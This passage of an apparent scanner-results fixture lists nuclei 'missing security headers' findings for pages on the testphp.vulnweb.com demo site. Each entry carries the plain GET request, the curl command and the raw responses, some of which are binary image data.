href='Details/web-camera-a4tech/2/'>Price<br>10 &euro;</a></td></table></tr></div><div class='product'><table><tr><td width='180px'><img src='images/3.jpg'></td><td width='400px'><a href='Details/color-printer/3/'>Laser Color Printer HP LaserJet M551dn, A4</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/color-printer/3/'>Price<br>812 &euro;</a></td></table></tr></div></div>\r\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 760, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2", + "discovered_date": "2024-11-13T02:41:56.208Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 761, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L", + "discovered_date": "2024-11-13T02:41:56.364Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 762, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3", + "discovered_date": "2024-11-13T02:41:56.520Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 763, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01", + "discovered_date": "2024-11-13T02:41:56.684Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 764, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36' 'http://testphp.vulnweb.com/cgi-bin/status'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin/status", + "discovered_date": "2024-11-13T02:41:56.844Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin/status HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 765, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3", + "discovered_date": "2024-11-13T02:41:57.036Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/color-printer/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 766, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36' 'http://testphp.vulnweb.com/pictures/3.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/3.jpg.tn", + "discovered_date": "2024-11-13T02:41:57.203Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/3.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 3725\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:42 GMT\r\nEtag: "4dca64a1-e8d"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0004\u0003\u0001\u0001\u0002\u0003\u0004\u0005\u0006\u0007\b��2\u0010\u0002\u0001\u0003\u0003\u0003\u0003\u0003\u0003\u0003\u0004\u0003\u0001\u0002\u0003\u0004\u0011\u0005\u0012!\u00061A\u0013"Q\u00142a\u0007q�\u0015B�\b\u0016#3C����\u001b\u0001\u0001\u0005\u0001\u0001\u0002\u0003\u0005\u0006\u0007\u0001\u0004��2\u0011\u0001\u0003\u0003\u0002\u0003\u0005\u0007\u0004\u0003\u0001\u0002\u0003\u0004\u00111\u0005!\u0012\u0013A\u0014Qaq�\u0006"#����2���3R���\f\u0003\u0001\u0002\u0011\u0003\u0011?��W�z�M.�wow\n�C$\u0012��\u001b�2\t�\u0004\u001f��V���\u0013u\u001b;6���Ŏp6�I�l<����I$�\r���xU�/E�]���\u001b\u0018\u0002�\u0010I�8\u0002�_A��\u001f\t;7�^�J��\u0013^\u0006��MB��N�M�]�k\u001b0Ei�\b\u0019���54R$��\u001c�b��\u001c�����V�}���&�ng�\u001at���\u0010�V^�\u001eB7���܌��\u000b�д\u000bk\u0013!���#\u001a��\u001f��\u0017�\u0018��@\u001cq��x��C��2Xn����^W��9��,\u001a=J�\r\u0015��[�V��N�n./u\u0012�\\Or-�F���\u000b�\t����v\u001cg<F*\u0012��JYLR\rǟ�KST����E\u0014Q^e��c\f\u001aJy\u0019�+�\\�t8&�JF)+�h��(B(��\u0010�F))�)���M�QE\u0014%-#���<u|�q��,�\u000e\u0016(W�.�� �(9��!N\f̀�\u001d\u0002H����1��#��j�]��6\u001a��픆+�w\u0012D�\u0003�����G��u=\u000b�r�!D�4��p�5�\r��\n6����\u000eq��\u0003�6��h���ψq\u001e�\u001f�UA�k�J8/a��wS�6�\u0010�\u0015\u0002M�㴞\b����|V\u0011\u0014*\r�\u0011K���Υ�b�\u001a�����\u0015\u001c"�\u001c��\u0005\u0001�)9�\u0004\u00023��\u0003Vnt����,��\u0018\f�,�����\b����;�T\u0018#4�\u0003��$_��Lj�s\u001fτ�\u0003�5F�e}^�錛�˹Q�ܟݸn\\�2pI�\u000e\u0018��p�A\u001bD�$c+�\u001bP�\u000e�r�}�ی�2@�+E�X��l��I$�\\͈�1�\u0018.�\u0005���\u001cs�c\u0007�n�\u001f�\u0012K�Y�\u0017��\u000eO�6\u0001 \u0012pH\u001cx�5\u0013�hkj�����^�\u0003�і4�T��\u0019쥺{�B[�=�<\n\u0010 �\u001d�m9ov�y�\u0003�;�[Qm+�fԯ`\u0002HmIJB�\u0002\u0015����\u0001��8���\u00157�w���RH�/��nTz��\t��;C�\u000f\u0019\u0007;\\�����Ҽ��29\u0006H\u001bm�:)��{\u0014%�w��4\u000f�{�R�K\u001b�)R{���KA��y\u0019U)�� n%�p2ɮ���4gP�@%Cn�|���s\u001e���=\u0002���L�wH���\u0005Q���B�\u001carX�[�\u0018�^X�Z��\u000fy�R���n\u001e�\nѤ��$3����.s�d`�\r�U�\u0004��\u0011�1����\u000b�|�T\r\u000e���#��zӲ��dRm��-. �����x�`q��7WW�\u0019\u0004py�KTw���\u0015k�^&�\u0014dc�\u0015!\u0019�L#\u0014�\u0013�u�QE\u0015ĤS[�:���Rٔ�QEq8��\u0010x�>�\u0016ݣv{�J����wY\u000b��E@op\u0007\u001f4G4��,���J����YO��G�J�u1�p�\u0016�������:�]Һ��P����+i\u000b<\u0013�;�\u0002\n����c������2\u000b��m6+�\u0016�\u0019��\u0006H��2�\u0006�\u0002�\u0005H�H'#\f8��f�w��t���t�7���`��Z\u0003�����x\u0004�\f�q���ƈ+�|f�\u001e�R��@w����>$�2����h��P\u0010v��\u00078� \u000e\u000f\u001c5c���x`\u0019&\u0017b_�y \f\u00021�ry>\u0006\u0001���L~�麪J���:X��\u0018�2����l(,s�q��8�ߤ���^�]\t��\u0005e�\u0010\u0006��;�a�\u001d��L��g\u0015V��梮��45����c�u3Y<U\u0014�\u0010�\\G��(��\u0004S.S�v�)]�8?�T���U��6�g;U\u0007���\u0007�p+Ch?��eN�͂�z\\[\u000b\tV�=1\u0011f!��\u0018݁��+��O\u0003�\u0006Z����els\u001cq�����}�\u0003\u0005����\u0005\fFv��S�\u001dr�D��9��k���O\u0004!w˳n�\u0016*�\u0001��\u001d��\u0003�U5�uN�6�&�B�{i�h���e)\u0018dS��\u001e\t\u0019�\u00185\u001eA\u001b/{\\\u000e�EE<�0�\u001aE��������Er�a�$�\u0018���.�\u0015��(��u�$`\r7a��B\u0001MU\u0002�{=-�}�5^�q�(\\7)�3Y�#�5-\u001e?B�oRɑ����z���I]��;�v���TG����9��#A\u001e)��|f�6+���z]�\u0015�ݴ��͆��FSϴ��mĀ�\n\u0014}ÀvΐV��$��E��\b\u001d�d�z{�l0���A�\u0018\r��+�S�\u0015���̈:;U�\u0018��o�C\u001e��\fH\u0014�9�nq��\u001a��\\�Z\u0007�<c�\u001f\u001f�{�c\u0012�\u001er�\u001d�P�@��E\u001c��+�W�k�^?\u0004\u000f��S��M�\u00078=����Hc�y�� S#���\t��o�{)$g `�dR�-��b\u0002��\u001d(!^��L�\\�Z\u0005����J�,ņ\u0006;\fg����ߨ�a��ԗ\u001af�,Q�X��n�\u0004�%�9\u0019V�;�3�\u001cv[�k\u000b)�YA�����A�\u0019��\u000f��\u0016��\u001a���s~>�c{q$�4r\b�"�IȐ�<�Kc䚶�3Hǽ�5\r\u0016h�����Z�Ao���[WGu����jVs�(�}5�.^\u0010�\u00138bQ@]ː9<�}�kg�\u001f\u0007k.@8a�23��kJ�.��Ӭn.���P��E\n�\u001cl�\u0018����p�x>�ʫ)\u0015�A\u001b��Y$���Ycm�c�\u0018\\|g�{��Q��Բ�YL�X��\u0002�w/~�\u001c��:glz}n��\u0014����eWJ�n�\u0014QE\tK��S�?�\u001e���e��2�~����~(E�h��w���Tl�⤢�\u0003eRH�v��@�\u0004�3�\t<e~���W\b��vn\u0018n\u0001�y ��\u0012��G\u0016��)�6ޙ �������3\u001b��?\u0014�7\u0002\u0017�l��Դ�.QU��E�#�~8#8$g���ޑ-�^��Kp���aLͱG~\u0013;s�8�'�q\\�􃨮.\u0012]\u001a�帒\u0012\u001a\u0007 �H�\u0014�\u0003\u0001U��'�'\u001c\fV��j����Z��%\t\u001eb�Uf�;\u0010�X/%w0�9�k*�����4;���\u0015ޒx*!�:�\u0019X�n�^�%�\u0001�0�F�I��\u0018��8 \u001c��d2�\u0007���ŧY�a�8�t��Q\u0019db��\u0018��I\u0018�rN1��V8�\u0015�QD�Jv���\u001fUI������D�K[�qf���*�m\u0004�\u0019�?8�#=�Z����.��I�C��b��\u001c[��#ö<n\bW�\u0005��8 �9��6IP�\t���yq\u001c��7PA��=��\u0015�0 1�+s��2\u0006pO��*�9.����d��=R�d<��\\��\u001f��l���\u000f�ț,\be�q�8$v�<g�\u0017�y���M�ҭ�./�`N@P\u0019�\u0004�\u00120q�ۃ�v\u0016\u001b�"��Ťv2q���ѩ��\u001eI(��ez\u0017������F�(��$�(?ju\u0015�ۨ�~iʠS��Ⱥ\u0001 �RJŁ&��v���\u0005\u0001:\u000b��+������>U���ߐFA\u001eA"��D�V}C���\u0005\f���wo'��\u0019'i�T��|�������\u001c�CE֯�[�u�ʊ���H�ш�q�\u0016\\�\u001c3\f�j\u001fX�;|<,6p�|���ON���]���Wf�ڰ.�Vu \u0015�\u0006\u0016@G�9<\u001e���\u001d�����Giz�Ŕ:��ۥ���T��h��z��\u0006=�vFs�r\t�4�s^�7��Ý�\u0011�FW��>T�\ft�V$��O�[����\u0013\bcc#M\u0004�\u0019W����Gܮ\u001c��\n~r(i��jw\u0006\u0018Z<�/���F��x\u0007\u0004�b21��m�u�XZ�*�Fھ��ҰEM��$*������c���D}��RzE\u0003��H���a��\u001a�{�0���s����2�(��ך�\u00063ڢ����F�(��"�(�\b��(Bl�mEE\u0015Ġ�\u0006�'=袄���\u000e�w�j�wd�:�Y\u0018e%O(�ʜv�\u00020@5�:�6WWqDIX����q�E\u0015�n�\u0007����x�ߴ�+m6��e\nč#;rX�\u001e�I$��w�\u0006�\\0\u0017�7��U\u0003\r\u0018\u000b��\u0011��9\u0018�\u0004w�<`��Ⱦ$�/����*�rțö>�W��\u0013�O.�=�П�.�\u0004\u0001��c�Y!\n��Wv�v�\u0019e\u0007�\u0015��f��ӧ��mn����B������8ݑ�؁��<`��(�:��\u000f�L�Od�����1��igw|��)��\u0004��\u00078����;�98�@�E\u0015\u0017�1���E�\u001f`�����\u0002�}���", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 767, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586' 'http://testphp.vulnweb.com/pictures/2.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/2.jpg.tn", + "discovered_date": "2024-11-13T02:41:57.364Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/2.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1353\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:42 GMT\r\nEtag: "4dca64a1-549"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001a\u0002\u0003\u0001\u0001\u0002\u0001\u0003\u0004\u0005\u0006��+\u0010\u0002\u0002\u0001\u0004\u0002\u0002\u0004\u0007\u0001\u0002\u0011\u0003\u0004\u0012!1AQ"a\u00142q�\u0005\u0013$B�����\u001b\u0001\u0002\u0003\u0001\u0001\u0001\u0003\u0001\u0002\u0004\u0005\u0006\u0007��'\u0011\u0002\u0002\u0001\u0004\u0002\u0002\u0001\u0005\u0001\u0001\u0002\u0011\u0003\u0004\u0012!1\u0005Q\u00132A"#3aq���\f\u0003\u0001\u0002\u0011\u0003\u0011?���d�H䏺JU�\t\u000f\b�i{\u0015+f�.7<������B6�˨����͒\u001bdס\u001a�i�E�n�_��%\u001atN\f�pR�H\u001d�,֝�\u0001 \u0014@'DQ\u0003Qu?b�-\u0010\u0005�L\t-\u0005�\u0001��\fH�'A\u0015F�\u001a�ʔ?z3G�^�|����b�#����K�)�ۓ�l�%��"䨤�\u001f�u\u0015Ed44�2\u0005�S�D\u0002Y\u0005F�`H\u0001\r\u0011L`"�)4(\fF�,�����\u0003%C�9��1F�$�c$��\u000f�~�Q_�ק{c'K�#��r|�R��(�Ԥ�I}#;��k�ʚ��ϳf���EmZ\u0010��\u0012Kȶ�А��C\u0001Z\u001a�B�\u0006Ҵ1I\n\u0004�X�\u001com�\u0004�,�7\u000e�}�\\1�,�\u001f\u0017��#�wG�ϫ�\u0016���dPf�<\u0013�K��G�4j��\u001c�i�$���a���j�4C\u000b���g�8�`�.�Μy)�N��?��j��\u001a�*�w\u0016�����),\u0012�5b����/�g%��[7e�b�\u001a�/�$�fiƎ֛3�����Х�5b�ޥ�@%Ţ\b\u0019v\u0014E\u0012M�(�\u0018\b�w1h��(���\u001e\u001a7��C\u001c���_�\f{,��َ[]��kp��p}\u001d?ĹI��'�&�jq���0����WO����kV���}\u001bq�|�c]�q5\u0018��p\u0013�J�3��]Fhe�\u0018��K�4�%r}��W��à��d�h�}��-�\\��\u001c�E��+B�+^�4j��\u0004\u0010�}�\u0004\fN�qb�Qe?e`6�\u001b~Ȣې�6߲v��܄&��\u0014C��J�x�\n>njlԑ��5CEY�3��j=�\nʱ��եj�б�N����f�p���k3��Ҿ�9���}3t���ψ�2J4�N\rvt���O��\u0018��>�q�%��\t��\u001fB��e�\u001bJ�\u001e�QM"(�»^,]�e\\FG2k�WAC�\r��.�bPQf���t[^\tP��Σ�(���\u00126�6�YlJ&���I\u0013D<���d\u0017 \u0006��p2�\u000e��m%\u000e6���uc���V��}��\u001dl*⏝y�J\u0019�K�Nn�N\u0012x�䋤rr%`\u0006-W���\u0013���Ed(�\u0003!�����P�8��k��\u0005)�?,+���;5\u0012�\f2���+��\u0004��e�2�\t7�6-"v�\u0001f�d�&ͺXA���Sh~�\\�W���%O��r��c\u0014�\u0004>Ό\u001b�CHe\u0014\b��\u0007��", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, 